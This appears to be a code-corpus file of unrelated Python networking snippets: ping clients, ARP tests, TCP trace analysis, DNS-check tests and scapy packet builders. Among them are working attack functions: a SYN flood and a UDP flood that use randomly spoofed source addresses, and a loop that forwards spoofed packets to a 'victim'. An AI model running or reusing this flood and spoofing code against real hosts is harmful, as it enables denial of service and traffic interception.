timestamp.group(1)\n\t\t\t\t\th, m, s, ms = map(int, re.split(r'[.:]+', time_str))\n\t\t\t\t\ttimestamp_delta = timedelta(hours=h, minutes=m, seconds=s, microseconds=ms)\n\t\t\t\t\tgEntries.append( (timestamp_delta, traffic_type) )\n\t\t\t\telse:\n\t\t\t\t\tgEntries.append( (None, -1))\n\n\t\tq.put((command.returncode, last_ip, gEntries))\n\t\treturn", "def send_p():\n while 1:\n if PACKET_QUEUE:\n mpkt = PACKET_QUEUE.pop()\n sendp(mpkt, iface=IFACE, loop=0) # forward spoofed packet to the victim", "def test_udp_query():\n assert dnsck_query(\"8.8.8.8\", \"google.com\", \"a\", 1) == 0", "def test_nmap_icmp_echo_request(self):\n assert_equal(self.test_nmap.ICMP_ECHO_REQUEST, 8)", "def adjust_ether (self, ip=None, ether=None):\n# The rules are:\n# 1. 
send to the group mac address address corresponding to the IP.dst\n if ip != None and ip.haslayer(IP) and ether != None and ether.haslayer(Ether):\n iplong = atol(ip.dst)\n ether.dst = \"01:00:5e:%02x:%02x:%02x\" % ( (iplong>>16)&0x7F, (iplong>>8)&0xFF, (iplong)&0xFF )\n # print \"igmpize ip \" + ip.dst + \" as mac \" + ether.dst \n return True\n else:\n return False", "def test_ignore_non_arp_packets(self):\n packet = IP(dst='www.apple.com') / TCP(dport=80) / Raw(b'test')\n\n chef = ARPChef()\n dumpling = chef.packet_handler(packet)\n\n assert chef.ip_mac == {}\n assert dumpling is None", "def SynAckAttack(host, cmds):\n\tprint(\"\\n###########################################\")\n\tprint(\"# Starting SYN ACK Attack..\")\n\tprint(\"###########################################\\n\")\n\t# ports=[]\n\ttry:\n\t\tamount = int(cmds[3])\n\texcept IndexError:\n\t\tamount = 1\n\ttry:\n\t\tports = cmds[2]\n\t\tports = [int(p) for p in ports.split('.')]\n\texcept IndexError:\n\t\tports = []\n\n\t# hosts = state.host_and_ports.keys()\n\t# ports = []\n\tif not ports:\n\t\tprint(\"***\\n[e]: No ports were specifed, please enter them like so: 80,81,88,3000\")\n\t\tprint(\"[cmds]: \", cmds)\n\t\tprint()\n\t\treturn\n\ttry:\n\t\t\t# for host in hosts:\n\t#\tprint(f\"# Attacking Target: {host}\")\n\t\tfor hostPort in ports:\n\t\t\tfor x in range(0, amount):\n\t\t\t\t# Build a random packet\n\t\t\t\ts_port = randInt()\n\t\t\t\ts_eq = randInt()\n\t\t\t\tw_indow = randInt()\n\n\t\t\t\tIP_Packet = IP()\n\t\t\t\tIP_Packet.src = randomIP()\n\t\t\t\tIP_Packet.dst = host\n\n\t\t\t\tTCP_Packet = TCP()\n\t\t\t\tTCP_Packet.sport = s_port\n\t\t\t\tTCP_Packet.dport = hostPort\n\t\t\t\tTCP_Packet.flags = \"S\"\n\t\t\t\tTCP_Packet.seq = s_eq\n\t\t\t\tTCP_Packet.window = w_indow\n\n\t\t\t\t# Send the packet\n\t\t\t\tsend(IP_Packet/TCP_Packet)\n\t\tprint()\n\t\tprint('***')\n\t\tprint(\"packets explanation:\")\n\t\tprint(\"sent %s packets of this form: \" % amount)\n\t\tIP_Packet.show()\n\t\tprint(\"ihl: internet header length\")\n\t\tprint(\"tos: type of service\")\n\t\tprint(\"frag: fragement offset\")\n\t\tprint(\"ttl: time to live [s]\")\n\t\tprint(\"proto: Protocol num, 0 = IPv6\")\n\t\tprint(\"chksum: check sum for error checking\")\n\t\tprint(\"***\")\n\t\tprint('TCP SYN packet: ')\n\t\tTCP_Packet.show()\n\t\tprint(\"sport: identifies sending port\")\n\t\tprint(\"dport: identifies receiving port\")\n\t\tprint(\"seq: seqence number. Dual role. If SYN flag is set (1), it's initial seqence number.\")\n\t\tprint(\" if flag is clear (0) this is accumulated seqence number for current session.\")\n\t\tprint(\"ack: ack number. 
If ACK flag set then this value is what sender of ACK expects to get back\")\n\t\tprint(\"dataofs: specifies the size of the TCP header in 32-bit words\")\n\t\tprint(\"flags: there are 9 1-bit flags\")\n\t\tprint(\"window: size of data windows sender of segment willing to receive back\")\n\t\tprint(\"chksum: error checking checksum\")\n\t\tprint(\"urgptr: position offset from the seqence number of last urgent data byte.\")\n\t\t# get grasp of all flags set in the Scapy TCP packet\n\t\t# obv, it's going to just be SYN, set with 'S'\n\t\tflags_vals = {\n\t\t\t'F': 0,\n\t\t\t'S': 0,\n\t\t\t'R': 0,\n\t\t\t'P': 0,\n\t\t\t'A': 0,\n\t\t\t'U': 0,\n\t\t\t'E': 0,\n\t\t\t'C': 0,\n\t\t}\n\t\tflags = {\n\t\t\t'F': 'FIN',\n\t\t\t'S': 'SYN',\n\t\t\t'R': 'RST',\n\t\t\t'P': 'PSH',\n\t\t\t'A': 'ACK',\n\t\t\t'U': 'URG',\n\t\t\t'E': 'ECE',\n\t\t\t'C': 'CWR',\n\t\t\t}\n\t\tfor f in TCP_Packet.sprintf('%TCP.flags%'):\n\t\t\tflags_vals[f] = 1\n\t\tprint('flags set in TCP SYN packet')\n\t\tprint([flags[x] for x in TCP_Packet.sprintf('%TCP.flags%')])\n\t\tprint(flags_vals)\n\texcept Exception as e:\n\t\tprint('in ping flood: ')\n\t\tprint('something was wrong with arguments: ', cmds)\n\t\tprint('\\n', e)\n\t\treturn", "def receive_one_ping(mySocket, myID, timeout):\n timeLeft = timeout/1000\n\n while True: # Loop enquanto aguarda o pacote ou o timeout \n startedSelect = default_timer() # Essa função retorna o tempo de espera junto com o tempo da CPU e depende da plataforma. \n\n whatReady = select.select([mySocket], [], [], timeLeft)\n howLongInSelect = (default_timer() - startedSelect)\n if whatReady[0] == []: # timeout\n return None, 0, 0, 0, 0\n\n timeReceived = default_timer() # Essa função retorna o tempo de espera junto com o tempo da CPU e depende da plataforma. \n\n \"\"\"\n Receba dados do soquete. O valor de retorno é um par (bytes, endereço) em que bytes é um objeto de bytes que representa\n os dados recebidos e endereço é o endereço do soquete que envia os dados \n \"\"\"\n recPacket, addr = mySocket.recvfrom(ICMP_MAX_RECV) \n\n \"\"\"\n struct.unpack( fmt , string ) \n Descompacte a sequência (presumivelmente empacotada por ) de acordo com o formato fornecido. 
\n O resultado é uma tupla, mesmo que contenha exatamente um item.\n \"\"\"\n ipHeader = recPacket[:20]\n iphVersion, iphTypeOfSvc, iphLength, \\\n iphID, iphFlags, iphTTL, iphProtocol, \\\n iphChecksum, iphSrcIP, iphDestIP = struct.unpack(\n \"!BBHHHBBHII\", ipHeader\n )\n\n icmpHeader = recPacket[20:28]\n icmpType, icmpCode, icmpChecksum, \\\n icmpPacketID, icmpSeqNumber = struct.unpack(\n \"!BBHHH\", icmpHeader\n )\n\n if icmpPacketID == myID:\n dataSize = len(recPacket) - 28\n # retorna o tempo de resposta, o tamanho dado, o ping pingado, o numero de seq, id e timeout \n return timeReceived, (dataSize+8), iphSrcIP, icmpSeqNumber, iphTTL\n\n timeLeft = timeLeft - howLongInSelect\n if timeLeft <= 0:\n return None, 0, 0, 0, 0 # retorna nada ", "def recv(sock: socket.socket, dest: io.BufferedIOBase) -> int:\r\n pktsRecv = []\r\n acksSent = []\r\n pause = .1\r\n num_bytes = 0\r\n while True:\r\n # Receive packets\r\n data = sock.recv(util.MAX_PACKET)\r\n if not data:\r\n break\r\n message, seq_num = getInfo(data)\r\n print(\"***********************************************************\")\r\n print(\"Received sequence number:\" , seq_num)\r\n # Create and send acks\r\n ack_num = int(seq_num) + len(message)\r\n ack = ack_num.to_bytes(3, \"big\")\r\n print(\"Sending ack:\", ack_num)\r\n if ack_num not in acksSent:\r\n dest.write(bytes(str.encode(message)))\r\n dest.flush()\r\n acksSent.append(ack_num)\r\n pktsRecv.append(bytes(str.encode(message)))\r\n sock.send(ack)\r\n num_bytes += len(message)\r\n return num_bytes", "def test_notice_replier_should_have_saved_request_ip_mac(arp):\n\n # Sender of this reply should have saved the src MAC and src IP of the request\n e = Ether(src='00:11:22:aa:bb:cd', dst='00:11:22:aa:bb:ca')\n a = ARP(hwsrc='00:11:22:aa:bb:cd', hwdst='00:11:22:aa:bb:ca', psrc='10.0.0.1', pdst='10.0.0.2', op='is-at')\n response = arp.receive_packet(e / a)\n assert type(response) is PermittedResponse\n\n # Sender of previous reply should not do a new request\n e = Ether(src='00:11:22:aa:bb:cd', dst='ff:ff:ff:ff:ff:ff')\n a = ARP(hwsrc='00:11:22:aa:bb:cd', hwdst='00:00:00:00:00:00', psrc='10.0.0.1', pdst='10.0.0.2', op='who-has')\n arp.receive_packet(e / a)\n response = arp.receive_packet(e / a)\n\n assert type(response) is NoticeRespone", "def process_pkt_from_client(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, fin_flag):\n if acks[saddr, sport, daddr, dport][co.S2C] >= 0:\n conn_id = acks[saddr, sport, daddr, dport][co.CONN_ID]\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_ACK_TCP] = ts_delta\n if fin_flag:\n connections[conn_id].flow.attr[co.S2C][co.TIME_FIN_ACK_TCP] = ts_delta\n\n bytes_acked = (tcp.ack - acks[saddr, sport, daddr, dport][co.S2C]) % 4294967296\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n increment_value_dict(nb_acks[co.S2C][conn_id], bytes_acked)\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n # If SOCKS command\n if size_payload == 7 and connections[conn_id].attr.get(co.SOCKS_PORT, None) is None:\n crypted_socks_cmd = tcp.data\n # This is possible because of packet stripping\n if len(crypted_socks_cmd) == 7:\n decrypted_socks_cmd = socks_parser.decode(crypted_socks_cmd)\n if decrypted_socks_cmd[0] == b'\\x01': # Connect\n connections[conn_id].attr[co.SOCKS_DADDR] = socks_parser.get_ip_address(decrypted_socks_cmd)\n connections[conn_id].attr[co.SOCKS_PORT] = socks_parser.get_port_number(decrypted_socks_cmd)\n\n if size_payload > 0 and tcp.seq in acks[saddr, sport, daddr, 
dport][SEQ_C2S]:\n # This is a retransmission! (take into account the seq overflow)\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.C2S][co.TIMESTAMP_RETRANS].append((ts_delta,\n ts_delta - acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][0],\n ts_delta - acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][1],\n ts_delta - acks[saddr, sport, daddr, dport][co.TIMESTAMP][CLIENT]))\n acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][1] = ts_delta\n elif size_payload > 0:\n acks[saddr, sport, daddr, dport][SEQ_C2S].add(tcp.seq)\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_TCP] = ts_delta\n acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq] = [ts_delta, ts_delta]\n # Don't think will face this issue\n# if len(acks[saddr, sport, daddr, dport][SEQ][co.C2S]) >= 3000000:\n# for x in range(50000):\n# acks[saddr, sport, daddr, dport][SEQ][co.C2S].popleft()\n\n acks[saddr, sport, daddr, dport][co.S2C] = tcp.ack\n acks[saddr, sport, daddr, dport][co.TIMESTAMP][CLIENT] = ts_delta", "def onPing(self, payload):", "def send_ping(self, seq_num):\n # Create a client socket, bind to random port, and set timeout of sock\n client_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n rand_port = random.randint(1024, 65535)\n host = socket.gethostbyname(socket.gethostname())\n client_sock.bind((host, rand_port))\n client_sock.settimeout(self.timeout)\n\n # If first request, print relevant message\n if seq_num == 1:\n print(f'PING {self.server_ip}')\n # Try - send ping request to server\n try:\n # build request message\n request_msg = self.build_message(seq_num)\n\n # Mark start time for calculating request message rtt (ms)\n start_time = time.time() * 1000\n # Send echo request message to server and receive any reply\n client_sock.sendto(request_msg, (self.server_ip, self.server_port))\n data, address = client_sock.recvfrom(2048)\n # Mark end time for calculating rtt (ms)\n end_time = time.time() * 1000\n\n # Add rtt to list of rtts\n rtt = int(end_time - start_time)\n self.rtt_list.append(rtt)\n # Increment request count since transmitted another message\n self.request_count += 1\n\n # Calculate checksum from server\n server_checksum = self.calculate_checksum(data)\n # Grab sequence number from reply message\n server_seq_num = int.from_bytes(data[6:8], byteorder='big')\n\n # If checksum from server reply is invalid, print error message\n # (invalid if sum of headers not = 65535 (all 1's in binary))\n if server_checksum != 65535:\n print(f'WARNING: checksum verification failure for echo reply '\n f'seqno={str(server_seq_num)}')\n # Otherwise print PONG\n else:\n print(f'PONG {self.server_ip}: seq={str(server_seq_num)} '\n f'time={rtt} ms')\n # Successfully received a reply\n self.reply_count += 1\n client_sock.close()\n\n # If have timeout exception, count as dropped\n except socket.timeout:\n self.request_count += 1\n client_sock.close()", "def _tcp_reassemble(self, number, src_addr, dst_addr, tcp):\n \n pld = tcp.message[tcp.header_len : tcp.header_len + tcp.segement_len]\n src_socket = (src_addr, tcp.src_port)\n dst_socket = (dst_addr, tcp.dst_port)\n sockets = (src_socket, dst_socket)\n\n def debug_cond(tcp):\n return False\n return True\n return tcp.stream_index == 710\n\n #check the other side of the tcp connection, flush the complete pdu to the msg_list\n if sockets in _tcp_buf and tcp.ack_num != _tcp_buf[sockets].ack: 
\n self._tcp_flush(sockets)\n del _tcp_buf[sockets]\n if debug_cond(tcp):\n print \"get a new http, decide by %d\" % number\n\n if debug_cond(tcp):\n print \"_tcp_reassemble, number= %d, sequence_num=%d, ack = %d, pldlen=%d, msglen=%d, opt_paddings=%d, iptotal_len=%d, ipheader_len=%d, tcpheader_len=%d\" % (number, tcp.ack_num, len(pld), len(tcp.message), len(tcp.opt_paddings), tcp.ip.total_len, tcp.ip.header_len, tcp.header_len)\n pass\n\n if pld:\n if not sockets in _tcp_buf:\n if debug_cond(tcp):\n print \" add a new message, begin with %d\" % number\n _tcp_buf[sockets] = Message({\n 'pcap_num_list': [],\n 'ts': self.packet_headers[number]['ts'] - self._ts_base,\n 'ip_proto': 'TCP',\n 'src_addr': src_addr,\n 'dst_addr': dst_addr,\n 'src_port': tcp.src_port,\n 'dst_port': tcp.dst_port,\n #'seq': tcp.sequence_num, HUA tcp disorder will generate error\n 'tcp_list': [],\n 'seq_min': 0,\n 'ack': tcp.ack_num,\n 'payload': [],\n 'stream_index': tcp.stream_index, # HUA add a stream index to message\n 'direction': tcp.direction, # HUA add to determin the http is request or response\n 'flag': False\n })\n try:\n _tcp_buf[sockets].ts = self.packet_headers[number]['ts'] - self._ts_base # HUA we should update ts and set it to last\n except:\n print number\n print len(self.packet_headers)\n _tcp_buf[sockets].pcap_num_list.append(number)\n if number == 2246:\n _tcp_buf[sockets].flag = False\n _tcp_buf[sockets].tcp_list.append(tcp)\n #offset = tcp.sequence_num - _tcp_buf[sockets].seq # seq 是相对的\n #_tcp_buf[sockets].payload[offset:offset+len(pld)] = list(pld)", "def ping(worker,count=4):\n ip=worker[1]\n \n ping = subprocess.Popen(\n [\"ping\", \"-c\", str(count), str(ip)],\n stdout = subprocess.PIPE,\n stderr = subprocess.PIPE\n )\n \n out, error = ping.communicate()\n \n #if anything is wrong stdout will be blank, therefore failure\n if len(out)==0:\n return False\n \n #search for packet loss and return the percentage\n return int(re.search(\"(\\d*)\\% packet loss\",out).group(1))!=100", "def arp_forwarding(self, msg, src_ip, dst_ip):\r\n datapath = msg.datapath\r\n ofproto = datapath.ofproto\r\n\r\n result = self.awareness.get_host_location(dst_ip)\r\n if result:\r\n # Host has been recorded in access table.\r\n datapath_dst, out_port = result[0], result[1]\r\n datapath = self.datapaths[datapath_dst]\r\n out = self._build_packet_out(datapath, ofproto.OFP_NO_BUFFER,\r\n ofproto.OFPP_CONTROLLER,\r\n out_port, msg.data)\r\n datapath.send_msg(out)\r\n self.logger.debug(\"Deliver ARP packet to knew host\")\r\n else:\r\n # Flood is not good.\r\n self.flood(msg)", "def receive_one_ping(my_socket, id, timeout):\n time_left = timeout\n while True:\n started_select = time.time()\n what_ready = select.select([my_socket], [], [], time_left)\n how_long_in_select = (time.time() - started_select)\n if what_ready[0] == []: # Timeout\n return\n\n time_received = time.time()\n rec_packet, addr = my_socket.recvfrom(1024)\n icmp_header = rec_packet[20:28]\n icmp_type, code, checksum, packet_id, sequence = struct.unpack(\n \"bbHHh\", icmp_header\n )\n # Filters out the echo request itself. 
\n # This can be tested by pinging 127.0.0.1 \n # You'll see your own request\n if icmp_type != 8 and packet_id == id:\n bytes_in_double = struct.calcsize(\"d\")\n time_sent = struct.unpack(\"d\", rec_packet[28:28 + bytes_in_double])[0]\n return time_received - time_sent\n\n time_left = time_left - how_long_in_select\n if time_left <= 0:\n return", "def ping(msg):\n return msg", "def forward(self, srcip, packet): #gets entire packet and srcip of that packet\n # get route to send packet\n best_route = self.get_route(srcip, packet[DEST]) #is a socket\n\n sock = best_route\n\n\n jsonpack = json.dumps(packet)\n sock.sendall(jsonpack.encode())\n # TODO fix src and dest\n return True", "def process_mptcp_syn_ack(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport, black_list, fast_conns, ts_syn_timeout, ts_timeout):\n # The sender of the SYN/ACK is the server\n if (daddr, dport, saddr, sport) in acks and ((ts_delta - acks[daddr, dport, saddr, sport][co.TIMESTAMP][CLIENT]).total_seconds() < ts_timeout\n and acks[daddr, dport, saddr, sport][co.C2S] == -1):\n # Better to check, if not seen, maybe uncomplete TCP connection\n acks[daddr, dport, saddr, sport][co.C2S] = tcp.ack\n acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER] = ts_delta\n conn_acks[acks[daddr, dport, saddr, sport][co.CONN_ID]][co.TIMESTAMP][SERVER] = ts_delta\n\n elif (daddr, dport, saddr, sport) in acks and ((ts_delta - acks[daddr, dport, saddr, sport][co.TIMESTAMP][CLIENT]).total_seconds() < ts_timeout\n and tcp.ack == acks[daddr, dport, saddr, sport][co.C2S]):\n # SYN/ACK retransmission! But don't do anything special\n acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER] = ts_delta\n conn_acks[acks[daddr, dport, saddr, sport][co.CONN_ID]][co.TIMESTAMP][SERVER] = ts_delta", "def test_udp_alt_rectype():\n cmd = [\n \"python\",\n \"dnsck/dnsck.py\",\n \"-s\",\n \"8.8.8.8\",\n \"google.com\",\n \"-t\",\n \"txt\",\n \"-i\",\n \"1\",\n ]\n process = subprocess.run(cmd, shell=False, check=True)\n assert process.returncode == 0", "def process_pkt_from_server(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, fin_flag):\n if acks[daddr, dport, saddr, sport][co.C2S] >= 0:\n conn_id = acks[daddr, dport, saddr, sport][co.CONN_ID]\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_ACK_TCP] = ts_delta\n if fin_flag:\n connections[conn_id].flow.attr[co.C2S][co.TIME_FIN_ACK_TCP] = ts_delta\n\n bytes_acked = (tcp.ack - acks[daddr, dport, saddr, sport][co.C2S]) % 4294967296\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n increment_value_dict(nb_acks[co.C2S][conn_id], bytes_acked)\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n if size_payload > 0 and tcp.seq in acks[daddr, dport, saddr, sport][SEQ_S2C]:\n # This is a retransmission!\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.S2C][co.TIMESTAMP_RETRANS].append((ts_delta,\n ts_delta - acks[daddr, dport, saddr, sport][HSEQ_S2C][tcp.seq][0],\n ts_delta - acks[daddr, dport, saddr, sport][HSEQ_S2C][tcp.seq][1],\n ts_delta - acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER]))\n acks[daddr, dport, saddr, sport][HSEQ_S2C][tcp.seq][1] = ts_delta\n elif size_payload > 0:\n acks[daddr, dport, saddr, sport][SEQ_S2C].add(tcp.seq)\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_PAYLD_TCP] = ts_delta\n acks[daddr, dport, 
saddr, sport][HSEQ_S2C][tcp.seq] = [ts_delta, ts_delta]\n # Don't think will face this issue\n# if len(acks[daddr, dport, saddr, sport][SEQ][co.S2C]) >= 3000000:\n# for x in range(50000):\n# acks[daddr, dport, saddr, sport][SEQ][co.S2C].popleft()\n\n acks[daddr, dport, saddr, sport][co.C2S] = tcp.ack\n acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER] = ts_delta", "def sendPing(self, payload=None):", "def test_udp_alt_iteration():\n cmd = [\"python\", \"dnsck/dnsck.py\", \"-s\", \"8.8.8.8\", \"google.com\", \"-i\", \"1\"]\n process = subprocess.run(cmd, shell=False, check=True)\n assert process.returncode == 0", "def test_udp_no_records():\n assert dnsck_query(\"8.8.8.8\", \"test.google.com\", \"A\", 1) == 0", "def test_notice_on_double_request(arp):\n\n e = Ether(src='00:11:22:aa:bb:ca', dst='ff:ff:ff:ff:ff:ff')\n a = ARP(hwsrc='00:11:22:aa:bb:ca', hwdst='00:00:00:00:00:00', psrc='10.0.0.2', pdst='10.0.0.1', op='who-has')\n\n response = arp.receive_packet(e / a)\n assert type(response) is PermittedResponse\n\n response = arp.receive_packet(e / a)\n assert type(response) is NoticeRespone", "def ping(self, ip):\n res = self.cli('ping ' + ip)\n # '8 bytes from fdde:ad00:beef:0:0:ff:fe00:e000: icmp_seq=2 hlim=64 time=236ms\\r\\n'\n # 'Error 6: Parse\\r\\n'\n # no answer\n ret_time = -1\n try:\n ret_time = int(res.split('time=')[1].split('ms')[0])\n except Exception:\n pass\n return ret_time", "def icmp_probe(self, ip):\n\n\t\tcmd = 'ping %s -n 10' % ip\n\t\tp = Popen(cmd, shell=True, stdin=PIPE, stderr=PIPE, stdout=PIPE)\n\t\tres = p.stdout.read()\n\n\t\tres = res.decode()\n\t\tif len(p.stderr.read()) == 0:\n\t\t\tif 'Destination host unreachable' in res:\n\t\t\t\treturn False\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False", "def upd_attack(host, cmds):\n\ttry:\n\t\tport = int(cmds[2])\n\t\tamount = 1\n\t\ttry: \n\t\t\tamount = int(cmds[3])\n\t\texcept IndexError as i:\n\t\t\tamount = 1\n\t\tfor i in range(0, amount):\n\t\t\tIP_Packet = IP()\n\t\t\tIP_Packet.src = randomIP()\n\t\t\tIP_Packet.dst = host\n\t\t\tsend(IP_Packet/UDP(dport=port))\n\t\tprint(\"sent %s UDP Packets\" % amount)\n\t\tprint(\"UDP Packet details:\")\n\t\tudp = UDP(dport=port)\n\t\tudp.show()\n\texcept Exception as e:\n\t\tprint('something went wrong in udp_attack ', e)\n\t\tprint('cmds: ', cmds)", "def test_udp_alt_rectype_and_iteration():\n cmd = [\n \"python\",\n \"dnsck/dnsck.py\",\n \"-s\",\n \"8.8.8.8\",\n \"google.com\",\n \"-t\",\n \"soa\",\n \"-i\",\n \"2\",\n ]\n process = subprocess.run(cmd, shell=False, check=True)\n assert process.returncode == 0", "def ping_once(sock, data_size=None, id=None):\n\n if data_size is None:\n data_size = 64\n \n if id is None:\n id = 1\n \n seq = 1999 # not really used here, but the TV show Space 1999! 
was pretty awesome when I was a kid.\n\n payload, packet = create_packet(id, seq, data_size)\n\n try:\n # Send it, record the time.\n sock.sendall(packet)\n time_send = now()\n\n # Receive response, record time.\n msg_recv = sock.recv(0xffff)\n time_recv = now()\n\n # Extract packet data.\n ip = dpkt.ip.IP(msg_recv)\n\n # Process results.\n is_same_data = (payload == ip.icmp.echo.data)\n time_ping = (time_recv - time_send)\n echo_id = ip.icmp.echo.id\n\n except socket.timeout:\n is_same_data = False\n time_ping = None\n echo_id = None\n\n # Done.\n result = {'time_ping':time_ping,\n 'data_size':data_size,\n 'timeout':sock.gettimeout()*1000., # convert from seconds to milliseconds\n 'is_same_data':is_same_data,\n 'id':id,\n 'echo_id':echo_id}\n\n return result", "def change_ip(sender_socket, ip, port):\n sender_socket.sendto(bytes(\"change ip\", \"UTF-8\"), (ip, port))\n new_ip_str = input(\"New Host IP Address: \")\n sender_socket.sendto(bytes(new_ip_str, \"UTF-8\"), (ip, port))\n sleep(0.5)\n status = sender_socket.recv(BUFFER_SIZE)\n status_message = status.decode(\"UTF-8\")\n if \"IP Address Successfully Changed\" in status_message:\n print(status_message)\n return True\n else:\n print(status_message)\n return False", "def echo_reply_handler(self, ev):\n now_timestamp = time.time()\n try:\n latency = now_timestamp - eval(ev.msg.data)\n self.echo_latency[ev.msg.datapath.id] = latency\n except:\n return", "def gen_udp_pkt(src=None, dst=None, payload_len=-1):\n getipaddr = lambda addr: rand_ipaddr() if addr is None else addr\n sip = getipaddr(src)\n dip = getipaddr(dst)\n payload = get_payload(payload_len)\n pkt = fuzz(IP(src=sip, dst=dip)/UDP())/payload\n # pkt.show2()\n # os.write(2, str(pkt))\n return str(pkt)", "def send_ping(my_socket, ip_addr, ID):\n ip = socket.gethostbyname(ip_addr)\n\n # Header is type (8), code (8), checksum (16), id (16), sequence (16)\n my_checksum = 0\n\n # Make a dummy heder with a 0 checksum\n # struct.pack(fmt, v1, v2, ...)\n # Return a string containing the values v1, v2, ... 
packed\n # according to the given format.\n # b:signed char, h:short 2, H:unsigned short 2\n header = struct.pack('bbHHh', ICMP_ECHO_REQUEST, 0, my_checksum, ID, 1)\n # struct.calcsize(fmt)\n # Return the size of the struct corresponding to the given format.\n byte_in_double = struct.calcsize(\"d\") # C type: double\n data = (192 - byte_in_double) * \"P\" # any char is OK, any length is OK\n data = struct.pack(\"d\", time.clock()) + data\n\n # Calculate the checksum on the data and the dummy header.\n my_checksum = get_checksum(header + data)\n\n # It's just easier to make up a new header than to stuff it into the dummy.\n # socket.htons(x)\n # Convert 16-bit positive integers from host to network byte order.\n header = struct.pack(\"bbHHh\", ICMP_ECHO_REQUEST, 0, socket.htons(my_checksum), ID, 1)\n packet = header + data\n # my_socket.sendto(packet, (ip, 1)) # getsockaddrarg() takes exactly 2 arguments\n my_socket.sendto(packet, (ip, 80)) # it seems that 0~65535 is OK (port?)", "def gtp_packets(\n self, type='fdir', tunnel_pkt='gtpu', inner_L3='ipv4',\n match_opt='matched', chk='', teid=0xF):\n pkts = []\n pkts_gtpc_pay = {'IPV4/GTPC': 'Ether()/IP()/UDP(%sdport=2123)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPC': 'Ether()/IPv6()/UDP(%sdport=2123)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid)}\n\n pkts_gtpu_pay = {'IPV4/GTPU': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid)}\n\n pkts_gtpu_ipv4 = {'IPV4/GTPU/IPV4': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/FRAG': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP(frag=5)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/UDP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/TCP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/SCTP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/ICMP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/ICMP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/FRAG': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP(frag=5)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/UDP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/TCP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/SCTP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/ICMP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/ICMP()/Raw(\"X\"*20)' % (chk, teid)}\n\n pkts_gtpu_ipv6 = {'IPV4/GTPU/IPV6/FRAG': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/IPv6ExtHdrFragment()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/UDP': 